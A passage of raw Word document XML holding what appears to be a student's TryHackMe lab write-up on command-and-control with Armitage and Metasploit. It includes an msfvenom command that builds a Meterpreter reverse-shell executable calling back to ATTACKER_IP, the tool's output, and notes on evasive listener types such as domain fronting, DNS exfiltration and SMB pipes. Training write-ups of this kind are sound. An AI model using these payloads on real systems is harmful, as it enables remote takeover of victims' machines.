        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00BD20FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>istener successfully configured</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>After setting up a listener, you can generate a standard windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set the LHOST to the Armitage server to receive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cal</w:t>
      </w:r>
      <w:r w:rsidR="00BD20FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>lbacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD20FA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to our Armitage server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F36F47" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36F47">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F36F47">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00C132B2" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C132B2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>MSFVenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C132B2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=ATTACKER_IP LPORT=31337 -f exe -o shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] No platform was selected, choosing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:Module</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>::Platform::Windows from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>[-] No arch selected, selecting arch: x86 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Payload size: 354 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Saved as: shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>After generating the windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>MSFVenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can transfer the payload to a target machine and execute it. After a moment or two, you should receive a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="006B2D93" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B2D93">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4686300" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="C:\Users\shefali\Pictures\THM\5.7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efali\Pictures\THM\5.7c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3076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00777253" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the Victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777253" w:rsidRDefault="00777253" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Listener Type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>As previously mentioned, standard reverse shell listeners are not the only ones that exist; there are many varieties that use many different protocols; however, there are a few common ones that we will cover, these being the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00267AC4" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267AC4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Listener - </w:t>
      </w:r>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">These often communicate directly over a raw TCP or UDP socket, sending commands in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cleartext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> has full support for generic listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="004712B3" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004712B3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/HTTPS Listeners - </w:t>
      </w:r>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">These often front as some sort of Web Server and use techniques like Domain Fronting or Malleable C2 profiles to mask a C2 server. When specifically communicating over HTTPS, it's less likely for communications to be blocked by an NGFW. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> has full support for HTTP/HTTPS listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>DNS Listener -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Listeners are a popular technique specifically used in the exfiltration stage where additional infrastructure is normally required to be set up, or at the very least, a Domain Name must be purchased and registered, and a public NS server must be configured. It is possible to set up DNS C2 operations in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the help of additional tools. For more information, see this "Meterpreter over DNS" presentation by Alexey </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sintsov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Maxim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Andreyanov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. These are often very useful for bypassing Network Proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9738F" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Listener - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Communicating via SMB named pipes is a popular method of choice, especially when dealing with a restricted network; it often enables more flexible pivoting with multiple devices talking to each other and only one device reaching back out over a more common protocol like HTTP/HTTPS. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> has support for Named Pipes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRPr="00F24819" w:rsidRDefault="008E7C34" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="004577B0" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004577B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1268849"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="17" name="Picture 17" descr="C:\Users\shefali\Pictures\THM\5.8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efali\Pictures\THM\5.8c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68849"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004577B0" w:rsidRDefault="004577B0" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="00142E14" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00142E14">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6 Command, Control, and Conquer </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6C41" w:rsidRPr="00EE6C41" w:rsidRDefault="00EE6C41" w:rsidP="00EE6C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Practice Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6C41" w:rsidRDefault="00EE6C41" w:rsidP="00EE6C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that you have learned how to exploit hosts using Armitage, you will now get to practice your skills by hacking the virtual machine by using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Armitage. There are multiple exploit paths that you may be able to follow. We encourage you to explore the various exploit paths you may be able to find in order to gain a better understanding of exploitation and post-exploitation modules in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Armitage. As a reminder, Armitage is just </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE6C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a GUI; all the same exploits exist and are categorized the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465F77" w:rsidRPr="00EE6C41" w:rsidRDefault="00465F77" w:rsidP="00EE6C41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: you can also visit launch guide for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the task 6</w:t>
      </w:r>
      <w:r w:rsidR="00E535EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00E535EE" w:rsidRPr="00B319BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1u-YmWl7cx3tO2vVjon0EtOGLXVCak2SJ/view</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E535EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07D24" w:rsidRDefault="00A07D24" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07D24">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5705475" cy="3733800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="C:\Users\shefali\Pictures\THM\6.4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efali\Pictures\THM\6.4c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5475" cy="3733800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="003E02DD" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Steps-</w:t>
      </w:r>
      <w:r w:rsidR="007633A5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> I followed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007633A5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007633A5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> as I was facing issues with Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E02DD" w:rsidRDefault="003E02DD" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
